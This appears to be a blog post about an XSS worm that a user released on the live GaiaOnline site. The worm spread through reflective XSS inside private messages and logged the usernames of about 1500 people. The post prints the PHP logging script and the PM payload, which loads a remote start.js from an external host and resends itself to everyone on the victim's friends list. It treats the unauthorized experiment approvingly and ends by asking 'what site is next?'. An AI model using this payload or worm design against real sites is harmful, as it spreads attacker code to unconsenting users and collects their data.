GaiaOnline is a highly popular web based game, a perfect target for an XSS worm. Exactly what Kyran sets out to do, with a little help from Kuza. I’ll be writing about his worm, why it’s so special, the results he’s collected and the response from GaiaOnline.
Normally when you consider an XSS worm, such as the infamous Samy worm, or lesser known IPB ones the one thing they have in common is how they spread. They abuse a filter flaw to store itself in some permanent storage system such as the users profile or the users sugnature. This worm differs in that it uses only reflective XSS holes.
A reflective XSS hole is one where the input you provided is not permanent but is only printed onto the page because it was one of your input variables, usually via GET or POST, in this case POST.
Back to the worm, Kyran was not interested in causing havoc, this worm is merely an experiment to see how much a non-permanent worm can spread on a site reach of 40% (source). First I’ll give you the logging script used.
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
// Declares file to log to.
$myFile = "log.txt";
// Set file handler. or end execution if file doesnt exist.
$fh = fopen($myFile, 'a') or die("can't open file");
//Take data sent via POST from start.js and put it in $stringData
$stringData = $_POST["username"];
// Write string to file.
// Add a tilde followed by newline to divide each entry.
$stringData = "~n";
As you can see he only logged the username, as he was not interesting in actually taking control of any accounts. Sadly no timestamp was set by each record, but I’m hedging my bets that next time there will be :p.
Now, onto the more juicy bits, the worm. It’s not long code (you won’t have to wade through something Samy like again). In short it does this:
- Create content to replace the page by
- Set up an AJAX object
- Create the variables used to send a PM (sending the PM to everyone in their friends list)
- Send the PM.
Gaia have a feature that if you send your PM to friends@gaia then the PM actually goes to everyone in your friends list, this allowed for an obvious shortcut in coding, but the worm would be perfectly possible without this, it would just require one extra AJAX request and some parsing. The payload of the PM is as follows:
“><script defer xsrc=//gaiaonli.site.com/start.js></script><style> (url changed)
As you can see it just pulls in the script again and again sends the PM to everyone in the friends list. I’ve got a copy of the script here, I have changed the url of log.php and start.js in the code, but otherwise this is what start.js would have looked like.
That’s the worm. It can be argued that it is a persistant attack as it is stored in a PM, but as Kyran said “the XSS is reflective, just the propogation method is persistant. But, that’s just semantics”.
What was logged through this worm? Kyran ran the worm for 3-4 hours (with a central .js file it’s easy to stop the worm) and logged 1500 unique usernames, but not much more can be deduced in terms of growth over time due to the lack of timestamps. Since the passwords weren’t logged we cannot check statistics on those, but I would hazard a guess at the statistic being similair to those of sites like MySpace. Furthermore, the point of this exercise was to see how well a reflective XSS worm can spread on a large site.
Kyran did post the worm (code included) on their forum, but that was quickly taken down by one of their mods. He created a new thread without the code in it, which has stayed up. Here’s Kyrans summary of the second thread “the staff haven’t posted anything. It’s mostly people calling me a terrorist”. As of yet they haven’t contacted him for any details (it is possible the mod who took down the first thread kept a copy of the code in which case there is no need to contact Kyran if all they want to do is patch the hole).
What can be understood from this whole incident? Reflective XSS can viably be used to spread an effective worm and sending variables via POST does not make people any safer. Considering how very common reflective XSS is (34 pages of reflective XSS flaws) this is something web masters really need to start getting to grips with. Furthermore it’s clear that Gaiaonline aren’t ready for users reporting flaws, they don’t know what to do when a flaw is reported and they aren’t too quick at fixing them (at the time of writing the flaw is still up).
Now… what site is next?